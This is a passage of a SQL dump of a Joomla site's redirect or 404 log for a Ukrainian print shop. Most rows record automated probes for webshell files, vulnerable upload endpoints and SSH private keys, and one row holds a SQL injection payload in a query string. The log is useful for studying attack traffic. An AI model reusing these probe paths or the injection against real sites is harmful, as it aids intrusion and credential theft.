00:00:00',301),(11663,'http://ekvatorprint.com.ua/tplpage.php',NULL,'http://ekvatorprint.com.ua/tplpage.php','',3,0,'2017-10-10 20:34:00','0000-00-00 00:00:00',301),(11664,'http://ekvatorprint.com.ua/general/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/general/popup-pomo.php','',10,0,'2017-10-11 02:03:54','0000-00-00 00:00:00',301),(11665,'http://ekvatorprint.com.ua/scriptsa/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/scriptsa/popup-pomo.php','',8,0,'2017-10-11 05:13:19','0000-00-00 00:00:00',301),(11666,'http://ekvatorprint.com.ua/menus/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/menus/popup-pomo.php','',12,0,'2017-10-11 05:14:54','0000-00-00 00:00:00',301),(11667,'http://ekvatorprint.com.ua/setupconfiga/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/setupconfiga/popup-pomo.php','',6,0,'2017-10-11 07:40:51','0000-00-00 00:00:00',301),(11668,'http://ekvatorprint.com.ua/network/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/network/popup-pomo.php','',11,0,'2017-10-11 08:41:56','0000-00-00 00:00:00',301),(11669,'http://ekvatorprint.com.ua/paypalapi/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/paypalapi/popup-pomo.php','',4,0,'2017-10-11 10:14:52','0000-00-00 00:00:00',301),(11670,'http://ekvatorprint.com.ua/updatecorea/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/updatecorea/popup-pomo.php','',7,0,'2017-10-11 12:37:46','0000-00-00 00:00:00',301),(11671,'http://ekvatorprint.com.ua/baws.php',NULL,'http://ekvatorprint.com.ua/baws.php','',8,0,'2017-10-11 14:17:42','0000-00-00 00:00:00',301),(11672,'http://ekvatorprint.com.ua/administrator/components/com_akeeba/helpers/sun.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_akeeba/helpers/sun.php','',4,0,'2017-10-11 14:53:18','0000-00-00 00:00:00',301),(11673,'http://ekvatorprint.com.ua/content-post.php',NULL,'http://ekvatorprint.com.ua/content-post.php','',4,0,'2017-10-11 15:35:25','0000-00-00 00:00:00',301),(11674,'http://ekvatorprint.com.ua/marvins.php',NULL,'http://ekvatorprint.com.ua/marvins.php','',3,0,'2017-10-11 17:48:21','0000-00-00 00:00:00',301),(11675,'http://ekvatorprint.com.ua/fascina/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/fascina/popup-pomo.php','',7,0,'2017-10-11 18:57:48','0000-00-00 00:00:00',301),(11676,'http://ekvatorprint.com.ua/parseopmla/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/parseopmla/popup-pomo.php','',10,0,'2017-10-11 19:35:29','0000-00-00 00:00:00',301),(11677,'http://ekvatorprint.com.ua/ekomi/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/ekomi/popup-pomo.php','',8,0,'2017-10-11 20:32:47','0000-00-00 00:00:00',301),(11678,'http://ekvatorprint.com.ua/fx2.php',NULL,'http://ekvatorprint.com.ua/fx2.php','',1,0,'2017-10-11 21:24:10','0000-00-00 00:00:00',301),(11679,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/help/content-post.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/help/content-post.php','',5,0,'2017-10-11 21:26:58','0000-00-00 00:00:00',301),(11680,'http://ekvatorprint.com.ua/options/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/options/popup-pomo.php','',12,0,'2017-10-11 22:15:19','0000-00-00 00:00:00',301),(11681,'http://ekvatorprint.com.ua/libraries/joomla/client/sun.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/client/sun.php','',1,0,'2017-10-11 22:24:07','0000-00-00 00:00:00',301),(11682,'http://ekvatorprint.com.ua/components/com_contact/helpers/sun.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/helpers/sun.php','',1,0,'2017-10-12 03:51:33','0000-00-00 00:00:00',301),(11683,'http://ekvatorprint.com.ua/rjsbgd.php',NULL,'http://ekvatorprint.com.ua/rjsbgd.php','',1,0,'2017-10-12 08:39:32','0000-00-00 00:00:00',301),(11684,'http://ekvatorprint.com.ua/wp-updats.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-12 09:08:54','0000-00-00 00:00:00',301),(11685,'http://ekvatorprint.com.ua/lsn_an.php',NULL,'http://ekvatorprint.com.ua/lsn_an.php','',4,0,'2017-10-12 12:02:09','0000-00-00 00:00:00',301),(11686,'http://ekvatorprint.com.ua/modules/mod_articles_category/tmpl/sun.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_category/tmpl/sun.php','',4,0,'2017-10-12 16:11:44','0000-00-00 00:00:00',301),(11687,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/layouts/joomla/edit/marvins.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/layouts/joomla/edit/marvins.php','',1,0,'2017-10-12 17:34:11','0000-00-00 00:00:00',301),(11688,'http://ekvatorprint.com.ua/components/com_banners/helpers/mdama.php',NULL,'http://ekvatorprint.com.ua/components/com_banners/helpers/mdama.php','',1,0,'2017-10-12 17:50:20','0000-00-00 00:00:00',301),(11689,'http://ekvatorprint.com.ua/stylesa/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/stylesa/popup-pomo.php','',6,0,'2017-10-12 20:33:20','0000-00-00 00:00:00',301),(11690,'http://ekvatorprint.com.ua/administrator/components/com_csvimproved/views/templatefields/tmpl/sun.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_csvimproved/views/templatefields/tmpl/sun.php','',3,0,'2017-10-12 20:49:42','0000-00-00 00:00:00',301),(11691,'http://ekvatorprint.com.ua/skin/Signedint.php',NULL,'','',1,0,'2017-10-13 12:44:58','0000-00-00 00:00:00',301),(11692,'http://ekvatorprint.com.ua/http:/',NULL,'','',1,0,'2017-10-14 16:45:21','0000-00-00 00:00:00',301),(11693,'http://ekvatorprint.com.ua/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)',NULL,'','',1,0,'2017-10-14 17:30:00','0000-00-00 00:00:00',301),(11694,'http://ekvatorprint.com.ua/main/wp-login.php',NULL,'','',1,0,'2017-10-15 13:11:09','0000-00-00 00:00:00',301),(11695,'http://ekvatorprint.com.ua/en/wp-login.php',NULL,'','',1,0,'2017-10-15 14:23:35','0000-00-00 00:00:00',301),(11696,'http://ekvatorprint.com.ua/libraries/cms/captcha/logo_img.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/captcha/logo_img.php','',2,0,'2017-10-16 07:27:45','0000-00-00 00:00:00',301),(11697,'http://ekvatorprint.com.ua/libraries/cms/captcha/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/cms/captcha/logo_img.php.suspected','',1,0,'2017-10-16 09:01:59','0000-00-00 00:00:00',301),(11698,'http://ekvatorprint.com.ua/mail/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/mail/logo_img.php.suspected','',3,0,'2017-10-16 11:06:06','0000-00-00 00:00:00',301),(11699,'http://ekvatorprint.com.ua/sessions/logo_img.php',NULL,'http://ekvatorprint.com.ua/sessions/logo_img.php','',5,0,'2017-10-16 12:24:59','0000-00-00 00:00:00',301),(11700,'http://ekvatorprint.com.ua/phpmyadmin/logo_img.php',NULL,'http://ekvatorprint.com.ua/phpmyadmin/logo_img.php','',1,0,'2017-10-16 14:36:38','0000-00-00 00:00:00',301),(11701,'http://ekvatorprint.com.ua/components/com_portfolio/includes/phpthumb/cache/1/1c/logo_img.php',NULL,'http://ekvatorprint.com.ua/components/com_portfolio/includes/phpthumb/cache/1/1c/logo_img.php','',5,0,'2017-10-16 15:55:31','0000-00-00 00:00:00',301),(11702,'http://ekvatorprint.com.ua/root/.ssh/id_rsa',NULL,'','',5,0,'2017-10-16 17:58:35','0000-00-00 00:00:00',301),(11703,'http://ekvatorprint.com.ua/root/.ssh/id_dsa',NULL,'','',5,0,'2017-10-16 17:58:37','0000-00-00 00:00:00',301),(11704,'http://ekvatorprint.com.ua/administrator/components/com_jcrawler/logo_img.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jcrawler/logo_img.php','',1,0,'2017-10-16 19:30:22','0000-00-00 00:00:00',301),(11705,'http://ekvatorprint.com.ua/wp-content/themes/project10-theme/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/project10-theme/style.css','',2,0,'2017-10-16 23:41:23','0000-00-00 00:00:00',301),(11706,'http://ekvatorprint.com.ua/language/zh-cn/logo_img.php',NULL,'http://ekvatorprint.com.ua/language/zh-cn/logo_img.php','',4,0,'2017-10-17 04:47:03','0000-00-00 00:00:00',301),(11707,'http://ekvatorprint.com.ua/plugins/content/pagenavigation/logo_img.php',NULL,'http://ekvatorprint.com.ua/plugins/content/pagenavigation/logo_img.php','',3,0,'2017-10-17 07:03:57','0000-00-00 00:00:00',301),(11708,'http://ekvatorprint.com.ua/_private/logo_img.php',NULL,'http://ekvatorprint.com.ua/_private/logo_img.php','',1,0,'2017-10-17 08:58:05','0000-00-00 00:00:00',301),(11709,'http://ekvatorprint.com.ua/log/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/log/logo_img.php.suspected','',2,0,'2017-10-17 09:54:01','0000-00-00 00:00:00',301),(11710,'http://ekvatorprint.com.ua/language/zh-cn/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/language/zh-cn/logo_img.php.suspected','',1,0,'2017-10-17 10:13:30','0000-00-00 00:00:00',301),(11711,'http://ekvatorprint.com.ua/sessions/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/sessions/logo_img.php.suspected','',5,0,'2017-10-17 16:50:12','0000-00-00 00:00:00',301),(11712,'http://ekvatorprint.com.ua/_private/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/_private/logo_img.php.suspected','',6,0,'2017-10-17 18:14:42','0000-00-00 00:00:00',301),(11713,'http://ekvatorprint.com.ua/plugins/content/pagenavigation/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/content/pagenavigation/logo_img.php.suspected','',7,0,'2017-10-18 01:07:47','0000-00-00 00:00:00',301),(11714,'http://ekvatorprint.com.ua/рпопро',NULL,'','',1,0,'2017-10-18 07:15:40','0000-00-00 00:00:00',301),(11715,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist',NULL,'','',1,0,'2017-10-19 12:14:24','0000-00-00 00:00:00',301),(11716,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',12,0,'2017-10-19 17:24:27','0000-00-00 00:00:00',301),(11717,'http://ekvatorprint.com.ua/wp-cros.php',NULL,'','',2,0,'2017-10-20 18:28:21','0000-00-00 00:00:00',301),(11718,'http://ekvatorprint.com.ua/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php','',3,0,'2017-10-21 18:13:43','0000-00-00 00:00:00',301),(11719,'http://ekvatorprint.com.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',2,0,'2017-10-22 13:46:55','0000-00-00 00:00:00',301),(11720,'http://ekvatorprint.com.ua/index.php?option=com_foxcontact',NULL,'','',10,0,'2017-10-22 21:07:13','0000-00-00 00:00:00',301),(11721,'http://ekvatorprint.com.ua/templates/index.php',NULL,'ekvatorprint.com.ua','',6,0,'2017-10-23 10:58:29','0000-00-00 00:00:00',301),(11722,'http://ekvatorprint.com.ua/trebovaniya   ',NULL,'','',2,0,'2017-10-23 14:49:21','0000-00-00 00:00:00',301),(11723,'http://ekvatorprint.com.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','',5,0,'2017-10-23 15:04:03','0000-00-00 00:00:00',301),(11724,'http://ekvatorprint.com.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',6,0,'2017-10-23 17:58:10','0000-00-00 00:00:00',301),(11725,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-za-zakaz',NULL,'','',4,0,'2017-10-25 08:59:10','0000-00-00 00:00:00',301),(11726,'http://ekvatorprint.com.ua/2017-10-25-09-04-20',NULL,'','',1,0,'2017-10-25 09:06:04','0000-00-00 00:00:00',301),(11727,'http://ekvatorprint.com.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',2,0,'2017-10-25 11:16:24','0000-00-00 00:00:00',301),(11728,'http://ekvatorprint.com.ua/images/pimeri_shablonov/u043cu0448-3-6.png',NULL,'','',2,0,'2017-10-25 16:50:43','0000-00-00 00:00:00',301),(11729,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/elfinder.html',NULL,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/elfinder.html','',2,0,'2017-10-26 08:33:03','0000-00-00 00:00:00',301),(11730,'http://ekvatorprint.com.ua/img/cancel.png',NULL,'http://ekvatorprint.com.ua/banner-printing','',8,0,'2017-10-27 13:00:41','0000-00-00 00:00:00',301),(11731,'http://ekvatorprint.com.ua/printing-on-canvas&nb=2',NULL,'','',2,0,'2017-10-28 17:40:55','0000-00-00 00:00:00',301),(11732,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_banners/banners/ojekusw.php',NULL,'http://site.ru','',1,0,'2017-10-29 14:40:48','0000-00-00 00:00:00',301),(11733,'http://ekvatorprint.com.ua/managera/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-10-29 15:33:25','0000-00-00 00:00:00',301),(11734,'http://ekvatorprint.com.ua/libraries/cms/html/hfawqa.php',NULL,'http://site.ru','',2,0,'2017-10-29 15:33:54','0000-00-00 00:00:00',301),(11735,'http://ekvatorprint.com.ua/00.php',NULL,'http://site.ru','',7,0,'2017-10-29 15:37:02','0000-00-00 00:00:00',301),(11736,'http://ekvatorprint.com.ua/bin/map.php',NULL,'http://site.ru','',1,0,'2017-10-29 16:12:17','0000-00-00 00:00:00',301),(11737,'http://ekvatorprint.com.ua/components/com_joomlawatch/css/Dfgsg.php',NULL,'http://site.ru','',1,0,'2017-10-29 16:14:36','0000-00-00 00:00:00',301),(11738,'http://ekvatorprint.com.ua/logs/pthtq.php',NULL,'http://site.ru','',1,0,'2017-10-29 16:55:56','0000-00-00 00:00:00',301),(11739,'http://ekvatorprint.com.ua/permalinka/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-10-29 17:43:50','0000-00-00 00:00:00',301),(11740,'http://ekvatorprint.com.ua/layouts/joomla/lwbzqzc.php',NULL,'http://site.ru','',1,0,'2017-10-29 19:32:56','0000-00-00 00:00:00',301),(11741,'http://ekvatorprint.com.ua/xmlrpc/kzeaz.php',NULL,'http://site.ru','',1,0,'2017-10-29 19:54:22','0000-00-00 00:00:00',301),(11742,'http://ekvatorprint.com.ua/logs/avprvmx.php',NULL,'http://site.ru','',2,0,'2017-10-29 19:55:51','0000-00-00 00:00:00',301),(11743,'http://ekvatorprint.com.ua/administrator/ykxoa.php',NULL,'http://site.ru','',2,0,'2017-10-29 20:27:48','0000-00-00 00:00:00',301),(11744,'http://ekvatorprint.com.ua/administrator/map.php',NULL,'http://site.ru','',1,0,'2017-10-29 20:34:16','0000-00-00 00:00:00',301),(11745,'http://ekvatorprint.com.ua/tmp/ojlrzz.php',NULL,'http://site.ru','',1,0,'2017-10-29 21:20:32','0000-00-00 00:00:00',301),(11746,'http://ekvatorprint.com.ua/images/stories/virtuemart/category/resized/ini.php',NULL,'http://site.ru','',1,0,'2017-10-29 21:41:25','0000-00-00 00:00:00',301),(11747,'http://ekvatorprint.com.ua/components/com_phocaguestbook/jtlwrbc.php',NULL,'http://site.ru','',1,0,'2017-10-29 21:41:38','0000-00-00 00:00:00',301),(11748,'http://ekvatorprint.com.ua/js.php',NULL,'http://site.ru','',4,0,'2017-10-29 21:45:06','0000-00-00 00:00:00',301),(11749,'http://ekvatorprint.com.ua/trudsovet1/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_lightview/css/lightview/skins/dark/IwEadz.php',NULL,'http://site.ru','',3,0,'2017-10-29 22:02:48','0000-00-00 00:00:00',301),(11750,'http://ekvatorprint.com.ua/administrator/components/com_akeeba/akeeba/filters/gpbph.php',NULL,'http://site.ru','',2,0,'2017-10-29 22:12:12','0000-00-00 00:00:00',301),(11751,'http://ekvatorprint.com.ua/plugins/authentication/twatg.php',NULL,'http://site.ru','',3,0,'2017-10-29 22:38:31','0000-00-00 00:00:00',301),(11752,'http://ekvatorprint.com.ua/images/pqcsfx3h.php',NULL,'http://site.ru','',2,0,'2017-10-29 22:58:25','0000-00-00 00:00:00',301),(11753,'http://ekvatorprint.com.ua/Marvins.php',NULL,'http://site.ru','',4,0,'2017-10-29 23:28:22','0000-00-00 00:00:00',301),(11754,'http://ekvatorprint.com.ua/images/banners/voyqhvw.php',NULL,'http://site.ru','',1,0,'2017-10-30 00:35:02','0000-00-00 00:00:00',301),(11755,'http://ekvatorprint.com.ua/optionsa/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-10-30 00:59:26','0000-00-00 00:00:00',301),(11756,'http://ekvatorprint.com.ua/administrator/components/com_akeeba/liveupdate/language/uk-UA/map.php',NULL,'http://site.ru','',2,0,'2017-10-30 01:32:18','0000-00-00 00:00:00',301),(11757,'http://ekvatorprint.com.ua/administrator/components/wavbkr.php',NULL,'http://site.ru','',1,0,'2017-10-30 01:49:18','0000-00-00 00:00:00',301),(11758,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/mebug.php',NULL,'http://site.ru','',1,0,'2017-10-30 02:32:43','0000-00-00 00:00:00',301),(11759,'http://ekvatorprint.com.ua/store/asqrvj.php',NULL,'http://site.ru','',1,0,'2017-10-30 02:51:30','0000-00-00 00:00:00',301),(11760,'http://ekvatorprint.com.ua/images/Xjske.php',NULL,'http://site.ru','',1,0,'2017-10-30 03:04:58','0000-00-00 00:00:00',301),(11761,'http://ekvatorprint.com.ua/language/system_infos.php',NULL,'http://site.ru','',7,0,'2017-10-30 03:25:26','0000-00-00 00:00:00',301),(11762,'http://ekvatorprint.com.ua/administrator/components/com_banners/zwpzz.php',NULL,'http://site.ru','',1,0,'2017-10-30 03:57:37','0000-00-00 00:00:00',301),(11763,'http://ekvatorprint.com.ua/templates/rhuk_milkyway/images/orange/jbqfc.php',NULL,'http://site.ru','',3,0,'2017-10-30 05:13:58','0000-00-00 00:00:00',301),(11764,'http://ekvatorprint.com.ua/wnu/htaccess.php',NULL,'http://site.ru','',2,0,'2017-10-30 05:22:00','0000-00-00 00:00:00',301),(11765,'http://ekvatorprint.com.ua/pressthisa/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-10-30 05:52:16','0000-00-00 00:00:00',301),(11766,'http://ekvatorprint.com.ua/components/com_ckeditor/Dnewv.php',NULL,'http://site.ru','',1,0,'2017-10-30 05:56:23','0000-00-00 00:00:00',301),(11767,'http://ekvatorprint.com.ua/plugins/installer/ddcwika.php',NULL,'http://site.ru','',2,0,'2017-10-30 06:52:42','0000-00-00 00:00:00',301),(11768,'http://ekvatorprint.com.ua/administrator/cache/ademo3.php',NULL,'http://site.ru','',1,0,'2017-10-30 07:36:09','0000-00-00 00:00:00',301),(11769,'http://ekvatorprint.com.ua/themesa/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-10-30 08:29:51','0000-00-00 00:00:00',301),(11770,'http://ekvatorprint.com.ua/actions/logo_img.php',NULL,'http://site.ru','',4,0,'2017-10-30 09:06:56','0000-00-00 00:00:00',301),(11771,'http://ekvatorprint.com.ua/libraries/cms/menu/ehysha.php',NULL,'http://site.ru','',3,0,'2017-10-30 09:15:48','0000-00-00 00:00:00',301),(11772,'http://ekvatorprint.com.ua/libraries/joomla/base/content-ubh.php',NULL,'http://site.ru','',4,0,'2017-10-30 09:32:29','0000-00-00 00:00:00',301),(11773,'http://ekvatorprint.com.ua/cli/kcvald.php',NULL,'http://site.ru','',1,0,'2017-10-30 09:33:58','0000-00-00 00:00:00',301),(11774,'http://ekvatorprint.com.ua/plugins/authentication/cookie/htaccess.php',NULL,'http://site.ru','',3,0,'2017-10-30 09:38:11','0000-00-00 00:00:00',301),(11775,'http://ekvatorprint.com.ua/modules/uazmdtt.php',NULL,'http://site.ru','',2,0,'2017-10-30 10:07:20','0000-00-00 00:00:00',301),(11776,'http://ekvatorprint.com.ua/followup/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-10-30 10:09:31','0000-00-00 00:00:00',301),(11777,'http://ekvatorprint.com.ua/plugins/xsyhfq.php',NULL,'http://site.ru','',2,0,'2017-10-30 10:47:52','0000-00-00 00:00:00',301),(11778,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/js/map.php',NULL,'http://site.ru','',4,0,'2017-10-30 12:01:12','0000-00-00 00:00:00',301),(11779,'http://ekvatorprint.com.ua/administrator/modules/mod_popular/tmpl/iahqrr.php',NULL,'http://site.ru','',1,0,'2017-10-30 12:01:38','0000-00-00 00:00:00',301),(11780,'http://ekvatorprint.com.ua/components/com_newsfeeds/helpers/wp-class.php',NULL,'http://site.ru','',3,0,'2017-10-30 12:02:56','0000-00-00 00:00:00',301),(11781,'http://ekvatorprint.com.ua/fosmanual/cache/logo_img.php',NULL,'http://site.ru','',3,0,'2017-10-30 12:05:27','0000-00-00 00:00:00',301),(11782,'http://ekvatorprint.com.ua/administrator/components/com_contact/nvxuu.php',NULL,'http://site.ru','',1,0,'2017-10-30 12:16:09','0000-00-00 00:00:00',301),(11783,'http://ekvatorprint.com.ua/components/com_search/models/mark.php',NULL,'http://site.ru','',1,0,'2017-10-30 12:46:26','0000-00-00 00:00:00',301),(11784,'http://ekvatorprint.com.ua/components/com_search/j_ajax.php',NULL,'http://site.ru','',1,0,'2017-10-30 13:04:08','0000-00-00 00:00:00',301),(11785,'http://ekvatorprint.com.ua/templates/system_infos.php',NULL,'http://site.ru','',5,0,'2017-10-30 13:06:14','0000-00-00 00:00:00',301),(11786,'http://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/sqlazure/htaccess.php',NULL,'http://site.ru','',1,0,'2017-10-30 13:43:08','0000-00-00 00:00:00',301),(11787,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/sun.php',NULL,'http://site.ru','',1,0,'2017-10-30 13:51:59','0000-00-00 00:00:00',301),(11788,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/layouts/joomla/edit/Marvins.php',NULL,'http://site.ru','',1,0,'2017-10-30 13:57:17','0000-00-00 00:00:00',301),(11789,'http://ekvatorprint.com.ua/unica/administrator/components/com_widgetkit/vendor/yootheme/framework/assets/angular-resource/Mnbbx.php',NULL,'http://site.ru','',3,0,'2017-10-30 14:48:45','0000-00-00 00:00:00',301),(11790,'http://ekvatorprint.com.ua/sec.php',NULL,'http://site.ru','',5,0,'2017-10-30 14:56:33','0000-00-00 00:00:00',301),(11791,'http://ekvatorprint.com.ua/cli/oirdpux.php',NULL,'http://site.ru','',1,0,'2017-10-30 15:20:47','0000-00-00 00:00:00',301),(11792,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/code/htaccess.php',NULL,'http://site.ru','',1,0,'2017-10-30 15:50:19','0000-00-00 00:00:00',301),(11793,'http://ekvatorprint.com.ua/images/banners/uiajjt.php',NULL,'http://site.ru','',2,0,'2017-10-30 16:21:00','0000-00-00 00:00:00',301),(11794,'http://ekvatorprint.com.ua/terma/popup-pomo.php',NULL,'http://site.ru','',6,0,'2017-10-30 16:21:03','0000-00-00 00:00:00',301),(11795,'http://ekvatorprint.com.ua/components/com_search/models/popup-pomo.php',NULL,'http://site.ru','',7,0,'2017-10-30 16:47:35','0000-00-00 00:00:00',301),(11796,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart_allinone/plugins/vmpayment/klarna/klarna/assets/images/share/baloon/X7t2CK.php',NULL,'http://site.ru','',3,0,'2017-10-30 17:16:26','0000-00-00 00:00:00',301),(11797,'http://ekvatorprint.com.ua/administrator/components/com_users/views/user/htaccess.php',NULL,'http://site.ru','',2,0,'2017-10-30 17:41:54','0000-00-00 00:00:00',301),(11798,'http://ekvatorprint.com.ua/administrator/modules/mod_feed/bxdjl.php',NULL,'http://site.ru','',1,0,'2017-10-30 17:53:09','0000-00-00 00:00:00',301),(11799,'http://ekvatorprint.com.ua/administrator/components/com_modules/htaccess.php',NULL,'http://site.ru','',1,0,'2017-10-30 18:04:57','0000-00-00 00:00:00',301),(11800,'http://ekvatorprint.com.ua/libraries/qerzztc.php',NULL,'http://site.ru','',2,0,'2017-10-30 18:09:03','0000-00-00 00:00:00',301),(11801,'http://ekvatorprint.com.ua/media/system/images/map.php',NULL,'http://site.ru','',2,0,'2017-10-30 18:09:29','0000-00-00 00:00:00',301),(11802,'http://ekvatorprint.com.ua/htaccess.php',NULL,'http://site.ru','',8,0,'2017-10-30 18:10:57','0000-00-00 00:00:00',301),(11803,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/layouts/com_media/htaccess.php',NULL,'http://site.ru','',4,0,'2017-10-30 18:14:44','0000-00-00 00:00:00',301),(11804,'http://ekvatorprint.com.ua/includes/phpInputFilter/zgcopxq.php',NULL,'http://site.ru','',4,0,'2017-10-30 19:05:36','0000-00-00 00:00:00',301),(11805,'http://ekvatorprint.com.ua/components/com_sigpro/vhcptp.php',NULL,'http://site.ru','',3,0,'2017-10-30 19:32:17','0000-00-00 00:00:00',301),(11806,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/Dwsonv.php',NULL,'http://site.ru','',1,0,'2017-10-30 19:33:19','0000-00-00 00:00:00',301),(11807,'http://ekvatorprint.com.ua/modules/nkpenrd.php',NULL,'http://site.ru','',3,0,'2017-10-30 19:57:26','0000-00-00 00:00:00',301),(11808,'http://ekvatorprint.com.ua/administrator/components/com_plugins/jibsyg.php',NULL,'http://site.ru','',3,0,'2017-10-30 20:07:06','0000-00-00 00:00:00',301),(11809,'http://ekvatorprint.com.ua/modules/fphofir.php',NULL,'http://site.ru','',3,0,'2017-10-30 20:10:11','0000-00-00 00:00:00',301),(11810,'http://ekvatorprint.com.ua/components/com_wrapper/xfracc.php',NULL,'http://site.ru','',1,0,'2017-10-30 20:48:01','0000-00-00 00:00:00',301),(11811,'http://ekvatorprint.com.ua/proekt/logo_img.php',NULL,'http://site.ru','',2,0,'2017-10-30 20:59:24','0000-00-00 00:00:00',301),(11812,'http://ekvatorprint.com.ua/components/com_weblinks/views/category/tmpl/esef.php',NULL,'http://site.ru','',1,0,'2017-10-30 21:41:21','0000-00-00 00:00:00',301),(11813,'http://ekvatorprint.com.ua/networksa/popup-pomo.php',NULL,'http://site.ru','',21,0,'2017-10-30 21:42:45','0000-00-00 00:00:00',301),(11814,'http://ekvatorprint.com.ua/images/sampledata/parks/smile.php',NULL,'http://site.ru','',3,0,'2017-10-30 22:09:31','0000-00-00 00:00:00',301),(11815,'http://ekvatorprint.com.ua/administrator/components/com_categories/views/category/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2017-10-31 00:06:29','0000-00-00 00:00:00',301),(11816,'http://ekvatorprint.com.ua/modules/dkcqe.php',NULL,'http://site.ru','',4,0,'2017-10-31 00:52:17','0000-00-00 00:00:00',301),(11817,'http://ekvatorprint.com.ua/templates/themza_j15_19/tlwvoa.php',NULL,'http://site.ru','',3,0,'2017-10-31 01:45:01','0000-00-00 00:00:00',301),(11818,'http://ekvatorprint.com.ua/new/media/akeeba_strapper/css/smoothness/content-post.php',NULL,'http://site.ru','',1,0,'2017-10-31 02:22:38','0000-00-00 00:00:00',301),(11819,'http://ekvatorprint.com.ua/modules/mod_kankod_copyrights/ystvq.php',NULL,'http://site.ru','',1,0,'2017-10-31 02:34:00','0000-00-00 00:00:00',301),(11820,'http://ekvatorprint.com.ua/administrator/head_img.php',NULL,'http://site.ru','',2,0,'2017-10-31 02:59:11','0000-00-00 00:00:00',301),(11821,'http://ekvatorprint.com.ua/components/read.php',NULL,'http://site.ru','',2,0,'2017-10-31 03:35:01','0000-00-00 00:00:00',301),(11822,'http://ekvatorprint.com.ua/language/zh-CN/logo_img.php',NULL,'http://site.ru','',1,0,'2017-10-31 03:59:51','0000-00-00 00:00:00',301),(11823,'http://ekvatorprint.com.ua/components/com_finder/views/htaccess.php',NULL,'http://site.ru','',2,0,'2017-10-31 04:03:26','0000-00-00 00:00:00',301),(11824,'http://ekvatorprint.com.ua/administrator/components/com_banners/ufegry.php',NULL,'http://site.ru','',3,0,'2017-10-31 04:15:27','0000-00-00 00:00:00',301),(11825,'http://ekvatorprint.com.ua/plugins/editors-xtd/xhmskkz.php',NULL,'http://site.ru','',2,0,'2017-10-31 04:31:58','0000-00-00 00:00:00',301),(11826,'http://ekvatorprint.com.ua/images/audio/Albums/shell123.php',NULL,'http://site.ru','',2,0,'2017-10-31 04:59:25','0000-00-00 